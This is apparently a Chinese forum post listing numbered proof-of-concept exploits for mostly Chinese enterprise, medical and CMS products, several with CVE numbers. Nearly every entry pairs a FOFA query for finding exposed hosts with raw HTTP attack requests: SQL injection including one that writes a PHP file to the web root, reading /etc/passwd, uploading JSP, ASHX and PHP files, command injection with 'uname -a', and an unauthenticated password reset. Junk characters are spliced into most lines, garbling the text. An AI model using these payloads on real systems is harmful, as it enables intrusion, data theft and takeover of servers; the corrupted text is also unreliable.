FOFA:app="REALOR-天翼应用虚拟化系统"9 l. q% L* G/ [
GET /index.php?s=/Admin/appsave&appid=3%27%29%3Bselect+unhex%28%273c3f706870206563686f206d643528223122293b202466696c65203d205f5f46494c455f5f3b20756e6c696e6b282466696c65293b%27%29+into+outfile+%27.%5C%5C..%5C%5C..%5C%5CWebRoot%5C%5Cplom.xgi%27%23 HTTP/1.12 B2 I8 }( H1 S3 V
Host: host
) g( \; G1 u! b. O- ~, P0 n5 @; Z* L* O e1 u
4 E% `5 M2 Q0 \* F) E+ q
186. F-logic DataCube3 SQL注入! e- ]6 m' o/ r A8 H
CVE-2024-31750. t( q& ~- ?4 u) o! {0 B# J8 o
F-logic DataCube3是一款用于光伏发电系统的紧凑型终端测量系统
, n: o! A/ d4 |. i! F$ x. lFOFA:title=="DataCube3"
- S) x* ^) d) ^) a APOST /admin/pr_monitor/getting_index_data.php HTTP/1.16 a3 F! {2 Z2 }: c9 S0 g+ i, i- Z) H
Host: your-ip
+ y' _- B$ K9 _( R7 c( R* ~0 r( gUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
: u, D5 [5 K* H# Q1 rAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.89 _! z, N& b: L
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.27 E+ j0 \; y( Z, V& }4 K; j- |
Accept-Encoding: gzip, deflate
S- a! \$ R2 [; f, rConnection: close
* X2 T9 M8 s3 d4 q; H! [Content-Type: application/x-www-form-urlencoded* c( g% \/ H& |
* S# o( o& n3 Z; C# o6 [3 U' C9 Zreq_id=1) AND 1113=LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2)))) AND (1450=14505 N* y: }* `. j
% d0 B3 u# Z; ]. u9 B
! m/ q0 J0 y; u6 y187. Mura CMS processAsyncObject SQL注入' r+ Z. k% Q& Z7 O9 z9 G
CVE-2024-32640
/ Q3 M; m7 V5 x. x }FOFA:"Mura CMS"6 y- ~3 ?7 i1 Y# q: Q2 [
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
: T7 \1 [* y& dHost: your-ip
5 b% S( k* \$ s9 ]1 }! ]1 RContent-Type: application/x-www-form-urlencoded9 k! I x" r# V- }$ X
* o# c/ N# p, H/ ?
- b B$ _& |- R* @) ~object=displayregion&contenthistid=x%5c' AND (SELECT 3504 FROM (SELECT(SLEEP(5)))MQYa)-- Arrv&previewid=1
j. t9 ?" l) M: _% f% |7 n
, o# A+ E. p& l0 O
! u* ~* l2 A9 c188. 叁体-佳会视频会议 attachment 任意文件读取2 D5 X* ]) Q$ P+ _
version <= 3.9.7
- ]2 I( ?, l* F! `2 x8 fFOFA:body="/system/get_rtc_user_defined_info?site_id"
6 \" G% g; {" |$ [! f/ MGET /attachment?file=/etc/passwd HTTP/1.1$ r" v9 C. K T% }+ p* w3 b' j! W
Host: your-ip* Q! ~+ D1 K& ]
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
/ d* c8 S( z4 y! }Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
8 L- A3 t/ A. g% o; lAccept-Encoding: gzip, deflate
1 \ @4 o. ` [/ \$ h! N! |Accept-Language: zh-CN,zh;q=0.9,en;q=0.81 j2 l, L9 B- S, X- F4 c
Connection: close
3 _ v# a) f0 M8 q4 p+ X7 y. x
7 v5 O: y! Q3 Q2 _4 T& A' I. N% L. c m- ~( z+ H- Y) V: l
189. 蓝网科技临床浏览系统 deleteStudy SQL注入; b& I, d2 \! X$ s g% n6 g5 H7 k
FOFA:app="LANWON-临床浏览系统"
& k+ @2 P s, r, @GET /xds/deleteStudy.php?documentUniqueId=1%27;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1! m. J' J8 ?8 A# _6 v, E) i
Host: your-ip/ a; G E, x9 b! D9 W
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
' m& ^* F" E) d4 p5 w, Q# F0 pAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
' d3 h& U8 F/ s* f4 q% G+ ^7 qAccept-Encoding: gzip, deflate
- F; Z0 K# Q- C1 O5 ^Accept-Language: zh-CN,zh;q=0.91 H$ |5 w6 E4 y( F4 h$ K
Connection: close! I8 b; K; e* ~; v+ g
4 z- F# N3 o x3 ~
! n8 e1 x& f" G6 g- [7 }
190. 短视频矩阵营销系统 poihuoqu 任意文件读取
: _" L5 z# j: EFOFA:title=="短视频矩阵营销系统"
3 r" f& o: T/ i# T: uPOST /index.php/admin/Userinfo/poihuoqu HTTP/2
' x9 }8 B! U' s6 qHost: your-ip
9 a! @8 t% V& Y" S7 X$ p2 d7 a& kUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36. k# N+ @1 b1 ]1 t7 ]
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
( ?" ?3 [2 _9 P x% E+ L4 ~/ BContent-Type: application/x-www-form-urlencoded
! ^8 g j8 `$ u2 tAccept-Encoding: gzip, deflate
7 |- ] u* s% _ n3 d5 C, v- r5 ]Accept-Language: zh-CN,zh;q=0.9, _5 s3 s' g2 c- ~" h5 |
Q% u$ Q8 J2 i" @" Q7 u. ]
poi=file:///etc/passwd' U' _3 `" v$ L! c# _0 L0 K9 n
' I: B% \ N/ |( |; g/ ?0 w
6 ? `' i3 b" D' a j191. 亿赛通电子文档安全管理系统 NavigationAjax SQL注入" x. U+ D! V, E' g4 T
FOFA:body="/CDGServer3/index.jsp"% }! i% w9 R0 b9 S
POST /CDGServer3/js/../NavigationAjax HTTP/1.12 b6 g9 ~8 \! U2 q* X( Z o
Host: your-ip
3 Y- c; P3 @3 Y2 k2 M* dUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36* N5 K. h, |! x' O3 {
Content-Type: application/x-www-form-urlencoded2 R" `: W0 d5 A- ]4 S
1 U6 ^# C, \/ _/ t. K
command=nav&id=1'waitfor delay '0:0:5'--+&name=&openId=
' {1 `: A! x" [$ ]7 u& z! U: c2 c: T% E! I2 o9 |- q8 r
( A# Z. [( X# ^# n' G3 J" a x3 ~+ i
192. 富通天下外贸ERP UploadEmailAttr 任意文件上传( [ X: ~) |- h* D7 U
FOFA:title="用户登录_富通天下外贸ERP"
" t8 i' v6 u) h4 M9 ?3 D* APOST /JoinfApp/EMail/UploadEmailAttr?name=.ashx HTTP/1.1! u, r7 _" c9 @6 I
Host: your-ip* o; N3 f) B: f9 x4 N2 q2 u% [( T
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
; H8 `4 {, ]0 w5 {/ \0 QContent-Type: application/x-www-form-urlencoded
7 G% p% |# w+ y7 \
1 R j0 |+ D( V" v# |. ]. a: m1 S4 T$ r J5 ^" Y6 c+ {. s
<% @ webhandler language="C#" class="AverageHandler" %>
5 T- O: _" n) i [using System;4 a2 Y+ s( t$ T. k+ S
using System.Web;- D" [. K" c) {1 C; A8 @
public class AverageHandler : IHttpHandler$ {9 K9 {) G6 Q- u! u8 c6 ?
{
% w. r2 |3 y& V2 e9 x, ?) g+ J' _public bool IsReusable% N0 s- O9 u' P( ~* O
{ get { return true; } }5 \( g ]7 a1 S# w$ i2 Z; }
public void ProcessRequest(HttpContext ctx)
& ?7 y+ ^. _2 l1 J* V$ d{& K- n" s% V" k, I1 }: G/ @
ctx.Response.Write("test");
' K9 @- H$ M8 d D9 {6 T# `" u}
. F8 j& H$ X( f# A8 B5 `}* [4 `$ q @$ y0 G
! K& {7 V4 Q0 L3 v6 v/ ]0 g
, [! K) s3 I6 j193. 山石网科云鉴安全管理系统 setsystemtimeaction 命令执行
3 Y3 N- X" r2 ~2 ~- \6 vFOFA:body="山石云鉴主机安全管理系统"3 G' B8 v* N l( ?& U5 F) M
GET /master/ajaxActions/getTokenAction.php HTTP/1.1
- D1 M# B3 z+ n& L, g2 b$ Q2 ZHost:2 n1 a- ?: c7 o. I! |& M
Cookie: PHPSESSID=2333333333333;
/ E3 l) C1 Z1 C& A4 a" x- q5 M5 n) VContent-Type: application/x-www-form-urlencoded
4 h9 ] A% E3 ~: O m- CUser-Agent: Mozilla/5.0
3 R+ P- P/ U& ]0 j' J9 B, _0 q4 Y7 Q+ u7 O, h- G
) V/ q# }. a* A5 Y1 d
POST /master/ajaxActions/setSystemTimeAction.php?token_csrf={{token}} HTTP/1.1; u5 M9 n+ F# m( n* ] `; X/ a
Host:2 d7 {4 g7 P) h3 w8 E$ |
User-Agent: Mozilla/5.0" ^* i9 {( Z1 } z% I) R
Accept-Encoding: gzip, deflate1 l. m; g5 B$ e) V4 ~2 ?
Accept: */*
: R& V/ d" g/ o9 |; G6 ^6 \( ~9 PConnection: close
+ e( s: [9 _' o5 b6 Z Q7 ]0 YCookie: PHPSESSID=2333333333333;% b- p# J: L8 \$ d9 I
Content-Type: application/x-www-form-urlencoded
. Z! x1 i( j: j) w8 L6 k! O9 A8 BContent-Length: 84# Q9 o7 z" F- S a3 S6 f
5 W+ a1 a6 k0 y* N8 T# l* J' x
param=os.system('echo 23333333333456 > /opt/var/majorsec/installation/master/runtime/img/config')
' d. f$ a% x }3 `: _, I7 F5 c- u; A5 H) H! }9 B$ m4 C
9 S, d- b D+ D& yGET /master/img/config HTTP/1.15 n# D+ \* R' F N. C0 H" A
Host:
; u. ^; M. E3 v5 {7 qUser-Agent: Mozilla/5.0
( E' g, }9 n5 p; g, {4 U# C, c6 z- q1 _
4 ^9 I# w3 c3 C! k9 |6 |5 V
4 u1 C/ _( c( W2 Q3 C194. 飞企互联-FE企业运营管理平台 uploadAttachmentServlet 任意文件上传
# _: f% W$ R# ^4 NFOFA:app="FE-协作平台"访问 /servlet/uploadAttachmentServlet 有返回则漏洞存在5 C$ z. \4 _ y$ Q* j
8 |+ V/ J9 J5 h {( ~& N! z$ B
POST /servlet/uploadAttachmentServlet HTTP/1.1
/ F7 u; Y" t* C! q8 Z$ [Host: host2 y( R! H( p1 }' k1 U9 w
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36$ W+ c9 _, P; Z4 N6 b
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
, n; H6 w, s0 T+ T, rAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.24 W1 j' C! z7 ?# l2 I7 k, f
Accept-Encoding: gzip, deflate
; M! f8 \4 I N3 T. R o9 |' C& mConnection: close4 E3 Y/ k9 e4 }) y) k
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryKNt0t4vBe8cX9rZk
/ Q8 n$ q$ b; \( l/ x1 s1 n8 [------WebKitFormBoundaryKNt0t4vBe8cX9rZk- |0 y4 S; ?6 e6 S( q
! @# `: h8 e+ J' m# y
Content-Disposition: form-data; name="uploadFile"; filename="../../../../../jboss/web/fe.war/hello.jsp"
5 A0 e2 Y: K2 O9 n- q v YContent-Type: text/plain
7 C( J: x, l# h7 q9 v* l1 v<% out.println("hello");%>0 H6 R3 f- |8 v, T J9 J4 p8 x
------WebKitFormBoundaryKNt0t4vBe8cX9rZk
/ J" ?9 U5 p1 x, h/ J0 j8 _Content-Disposition: form-data; name="json"
& e7 I* C$ n$ @7 @' l {"iq":{"query":{"UpdateType":"mail"}}}; a l0 M5 E6 D1 | ]: M
------WebKitFormBoundaryKNt0t4vBe8cX9rZk--! H# K7 V1 W r6 ]1 q
. _$ g7 A& Q6 M; l$ k+ E1 p2 j' E
q7 a4 K; I$ A' {195. 飞鱼星上网行为管理系统 send_order.cgi命令执行7 {2 m6 R( K. q- r
FOFA:title=="飞鱼星企业级智能上网行为管理系统
8 B' N2 m. M$ {9 P: K& m/ t9 N% UPOST /send_order.cgi?parameter=operation HTTP/1.1
1 n8 n0 g, [3 U8 U9 EHost: 127.0.0.11 s0 {; l, J) k% R3 ^3 s1 u/ w/ g
Pragma: no-cache1 |3 k7 m7 d! x7 |9 z3 w
Cache-Control: no-cache0 K3 z0 O3 q6 @2 v0 _
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36) E# u5 ~, R) f: s1 f3 O- r% T; o
Accept: */*
_# E+ p' i! [2 XAccept-Encoding: gzip, deflate
! Q( R# u5 v) a0 c1 T; e; G$ [Accept-Language: zh-CN,zh;q=0.94 P4 E, S& L' h7 M; N x, I9 H
Connection: close
0 u& V m" Q; b+ c+ D9 ?8 \Content-Type: application/x-www-form-urlencoded
- G( O$ a) i0 Z. X5 XContent-Length: 68$ J+ d) i7 k* [
4 o: N# `/ |3 t6 ^! E
{"opid":"777777777777777777","name":";uname -a;echo ","type":"rest"}, I1 N* { J9 m/ W
* Z) k7 d M' W% @
% [) g6 Z% X/ {- q; [" M196. 河南省风速科技统一认证平台密码重置, F' I9 R* |- Y! r4 E
FOFA:body="/cas/themes/zbvc/js/jquery.min.js"
?0 C* m; T% j$ e4 A- M* |POST /cas/userCtl/resetPasswordBySuper HTTP/1.14 X" V. C4 \) r4 w0 e
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36" m. Q# o' H: r7 @# s# h4 }. B
Content-Type: application/json;charset=UTF-8
% f. q; A# } M4 SX-Requested-With: XMLHttpRequest
& E E- x4 k& ~- ]Host:
1 f U5 `1 e0 T5 W) _. d$ iAccept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
& T+ X8 t0 ?' XContent-Length: 45
1 F0 ?! `# \5 r- c$ k. U+ \Connection: close7 b. s9 M3 J2 \0 N3 e
0 u! `- c* { e/ G
{"xgh":"test","newPass":"test666","email":""}
. {8 J1 m4 j3 V2 Z- L6 s: W A
/ i1 W. \5 N' e+ \- N9 d: z
* x5 ~/ ~: _8 o1 z
' M' J p2 y. D' o0 X$ x6 u+ r$ X197. 浙大恩特客户资源管理系统-Quotegask_editAction存在SQL注入
" p$ z- S% g& Y& { f) H7 MFOFA:app="浙大恩特客户资源管理系统"
1 H& p; f- T- d7 Y0 ~# F/ nGET /entsoft/Quotegask_editAction.entweb;.js?goonumStr=1')+UNION+ALL+SELECT+111*111--+&method=goonumIsExist HTTP/1.1
* v4 x' e$ d d2 n* C% bHost:3 s% o1 w, Q. k/ v$ `* y) W- e7 {
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36/ o U- f. @ G' E$ Y* X" H8 T
Accept-Encoding: gzip, deflate
& r, {6 e: W/ {- ?) eConnection: close
; M( V, y: W8 q1 B, t9 m9 c/ r: B1 G/ q/ W
1 s. {+ g/ R# i9 R; |- l1 Y8 n3 L
- P2 Y. O3 d0 y2 [+ K! z
198. 阿里云盘 WebDAV 命令注入: j$ }. o f; v& w9 v+ M' R
CVE-2024-296402 U+ r+ `: C) ]/ Z5 X
GET /cgi-bin/luci/admin/services/aliyundrive-webdav/query?sid=%60%6c%73%20%2f%3e%2f%77%77%77%2f%61%61%61%2e%74%78%74%60%20 HTTP/1.1
$ q. z! E+ z% pCookie: sysauth=41273cb2cffef0bb5d0653592624cf64
5 {6 J' f( W! v) ?+ z( TAccept: */** r8 b4 s5 Y! d7 S
Accept-Encoding: gzip, deflate
! q. M& N/ Z9 v5 C m( {9 _Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
/ e# M8 q5 b. O5 m/ _) q) `8 FConnection: close
4 Q! b8 j( b* M
6 M: O9 v+ _: N
# y/ k& V0 B% z7 [199. cockpit系统assetsmanager_upload接口 文件上传+ a* O0 E0 J: t1 O: j
% ]8 p7 V9 j ^. R1.执行poc进行csrf信息获取,并获取cookie,再上传访问得到结果:
. A2 c! `( e! pGET /auth/login?to=/ HTTP/1.1
) a6 ~2 X' c8 P) H; w6 x. B1 v
0 e$ H S; X8 `响应:200,返回值:csfr:"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"
8 h, u3 J! J( \: R, J; q+ z" o1 Q2 A5 u- O' `! L
2.使用刚才上一步获取到的jwt获取cookie:$ f! `( u2 p( {' M
6 ?2 g* m. v$ W$ C8 g
POST /auth/check HTTP/1.1
2 }' Q k u! |# r$ W: m8 c- a1 [Content-Type: application/json' {1 Q4 A3 j7 z% ?
0 q( V! H$ A0 }" e
{"auth":{"user":"admin","password":"admin"},"csfr":"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"}8 m! N; L% j1 g: G
- a( k, p) {; G# {- U
响应:200,返回值:9 y( A2 x' T5 M) |
Set-Cookie:mysession=95524f01e238bf51bb60d77ede3bea92: path=/- X% t5 D" d! S8 U
Fofa:title="Authenticate Please!"
) V* a, t9 n3 K: C8 uPOST /assetsmanager/upload HTTP/1.12 W, o1 x' x' i7 r8 d
Content-Type: multipart/form-data; boundary=---------------------------36D28FBc36bd6feE7Fb3. H3 G, s% l7 X2 h) r
Cookie: mysession=95524f01e238bf51bb60d77ede3bea920 W7 E& W# t. d& n( n: H' S* Q
- ~; ?# f( h3 p- X-----------------------------36D28FBc36bd6feE7Fb39 F$ d5 ?" A$ P% N
Content-Disposition: form-data; name="files[]"; filename="tttt.php"
V8 N8 ]6 t, N9 B! |2 OContent-Type: text/php
# V n* b& X; m4 M% N7 T( Z( e/ t/ S
<?php echo "tttt";unlink(__FILE__);?>
+ J, N! L$ B" e) s2 C1 n-----------------------------36D28FBc36bd6feE7Fb32 Y% o' H( h+ Y& C: J+ {# l# E1 m: n
Content-Disposition: form-data; name="folder"
" w( y4 P. \3 O, L$ h) m& R0 a5 P$ L# s9 \( H; j$ |! p
-----------------------------36D28FBc36bd6feE7Fb3--
- v" o. _6 s a2 T) a
5 w/ c" u. v2 e, A7 X. j; u
" E4 i5 b4 O: S# J/storage/uploads/tttt.php7 R% S5 u3 C8 h
. n& i) e5 c. a& b' u) z200. SeaCMS海洋影视管理系统dmku SQL注入
) _/ ~) ^8 i _7 M' b* VFOFA:app="海洋CMS"$ F: \+ \! i) J, n( z
GET /js/player/dmplayer/dmku/?ac=del&id=(select(0)from(select(sleep(5)))v)&type=list HTTP/1.1
. k [# m# H+ |1 s1 c3 f0 ?" xCookie: PHPSESSID=hlfl5flck9q3ng1blehhv86s4s2 q( N* \) \ K7 f% ^7 @/ f: j
Upgrade-Insecure-Requests: 18 N+ s: ~/ A; I8 S& U9 y+ `
Cache-Control: max-age=0' i2 k, J7 E# q' h
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7) d$ i( \/ ~- v7 y
Accept-Encoding: gzip, deflate# z1 u% {, q# ?& s6 u6 z9 D# M
Accept-Language: zh-CN,zh;q=0.9% {' h- [* g' w# \' M
0 K% b3 ?8 }( ~# I( B! W$ h. v
) \- `: d& w% s5 i2 [
201. 方正全媒体新闻采编系统 binary SQL注入6 [6 d- |# g" O. O& g. Z
FOFA:body="/newsedit/newsedit/" || app="FOUNDER-全媒体采编系统"
0 O- V! V5 u+ ?/ ], c8 EPOST /newsedit/newsplan/task/binary.do HTTP/1.1
; m6 F# V( M$ z9 c fContent-Type: application/x-www-form-urlencoded
: s- r1 r6 c# R$ q) J7 v0 BAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+ B* g0 u2 d- [3 s& v+ MAccept-Encoding: gzip, deflate& s( C5 Q7 y) T9 V' w
Accept-Language: zh-CN,zh;q=0.9
C n: y# q' L& x; }+ {; N# g- TConnection: close1 Z- _( V3 h- H
$ `0 j, a; C |9 g$ P0 Q
TableName=DOM_IMAGE+where+REFID%3D-1+union+select+%271%27%3B+WAITFOR+DELAY+%270%3A0%3A5%27%3Bselect+DOM_IMAGE+from+IMG_LARGE_PATH&FieldName=IMG_LARGE_PATH&KeyName=REFID&KeyID=1
) M8 ]( c' n) L( y, D# x; J \. W8 m( Q$ K) A D" o
- x+ f; f) }+ v+ Y5 z( w- a+ C+ b- p
202. 微擎系统 AccountEdit任意文件上传; }: ?7 Q$ z' t' j C1 g
FOFA:body="/Widgets/WidgetCollection/"' F6 y2 ~7 Q1 S0 P3 y, c" S
获取__VIEWSTATE和__EVENTVALIDATION值
- R( Z2 @1 [1 Y- Y( ?0 uGET /User/AccountEdit.aspx HTTP/1.16 `) x9 s9 ~1 {) f( R$ J- i
Host: 滑板人之家
. ^7 X6 u8 O* r0 vUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/531.36 (KHTML, like Gecko) Chrome/83.0.4103.112 Safari/537.313 P4 `4 W+ r4 z7 g; {* w; q
Content-Length: 02 U3 F. D5 a$ z9 R/ D; @: U
, i; X# q& s( Y b8 w+ Q6 Q/ D
' a3 {6 |5 E2 B) t6 J替换__VIEWSTATE和__EVENTVALIDATION值
( j6 s. c' g9 [$ E: tPOST /User/AccountEdit.aspx HTTP/1.17 X$ I5 n6 I0 P9 i
Accept-Encoding: gzip, deflate, br. U7 p% a/ E* |- r1 u, K Q: H4 M( V
Content-Type: multipart/form-data;boundary=---------------------------786435874t385875938657365873465673587356878 ]4 t1 W6 |: w, x8 f
4 C* g/ e; {2 ^
-----------------------------786435874t38587593865736587346567358735687. N+ p! W M' R3 Q" f
Content-Disposition: form-data; name="__VIEWSTATE"4 B" C7 c# x1 \4 t
1 z; ~# k2 `5 X o! e. i__VIEWSTATE/ ?& y1 Q3 k S+ ^6 e% P" B
-----------------------------786435874t38587593865736587346567358735687. w" F( s) `, K0 ~% T9 P
Content-Disposition: form-data; name="__EVENTVALIDATION"
3 M+ v) o4 j3 `/ S0 A; P2 {! E/ q( S# X6 O+ d, c
__EVENTVALIDATION L3 Q# O8 p0 t# V1 N' g
-----------------------------786435874t38587593865736587346567358735687* C0 c- R' L9 I% q# `2 }2 l
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$upload"; filename="1123.txt"
3 S7 x$ k4 D6 }$ ~Content-Type: text/plain
5 r) [. f) t5 p, H6 W% S# h* B! X/ @5 k( c7 V! i: G4 z8 d
Hello World!3 L9 h* Z: f" k8 s, \
-----------------------------786435874t38587593865736587346567358735687* |/ Q. n! S! s* b4 Z
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$bttnUpload"
; E' r2 f: I; z9 V
5 z s9 Y6 |# b) z2 @上传图片. e% R5 O5 d$ \9 _1 P
-----------------------------786435874t38587593865736587346567358735687
" W+ d7 i8 Z0 a8 f { v% [Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtLastName"
- M8 b# Q. L) t1 t" u, B/ R& w0 o. F0 w- r& _
- n. d @, g* v+ K, F
-----------------------------786435874t38587593865736587346567358735687
' E5 v9 g V! aContent-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtEmail"
]) B+ S8 \+ Z9 t1 x
, B! z+ x! u+ r6 o ~/ O9 t
" `+ r+ ?9 L. P2 Q-----------------------------786435874t38587593865736587346567358735687--
U. j7 `- a4 \' h- |& B) {" }8 z; F2 x# m
( u, ~: L* f/ _& n5 q( {' f
/_data/Uploads/1123.txt9 J0 q- x! c# U! A1 M( U& w
+ Y9 y; M( V% q6 l/ H5 W203. 红海云EHR PtFjk 文件上传! l( R* w X; V' M
FOFA:body="RedseaPlatform"
" w& d5 y* e R5 J6 _4 wPOST /RedseaPlatform/PtFjk.mob?method=upload HTTP/1.1
) ~" ?4 O5 z: w3 T: yHost: x.x.x.x
8 R/ R/ m# }% f \, q( `3 H" CAccept-Encoding: gzip
: b- [# a- d- B& d. CUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
! K1 {2 s' ~* W! ?0 qContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryt7WbDl1tXogoZys4
' i: _- _; D5 [! LContent-Length: 210
8 N1 s2 V9 a* \. K4 B7 x+ {8 J, \1 S* R% J
------WebKitFormBoundaryt7WbDl1tXogoZys4: v$ m1 f% Z, m3 M9 B Z
Content-Disposition: form-data; name="fj_file"; filename="11.jsp"
% w. _2 k- }& K% P3 }5 z2 D7 \Content-Type:image/jpeg
" z0 u) b0 I5 q5 Z: d" g, w& F* f" c3 P+ K3 K
<% out.print("hello,eHR");%>
; k( h' |7 B1 D" `1 Z------WebKitFormBoundaryt7WbDl1tXogoZys4--
% ]2 ~) r" s: U _; P/ o7 H
c3 [0 `$ |4 R1 j$ V! t
+ u2 [' x/ W- R8 g/ E, o1 g7 w! P
! ?& o0 P) d4 Y7 V1 ^- I$ m9 j: D" j0 }' S0 A
, {& L, Y2 b1 _% P5 n& Q& }
. [8 a. K$ q7 c( _: _0 V! q |
发表于 2024-6-5 14:31:29
收藏
支持
反对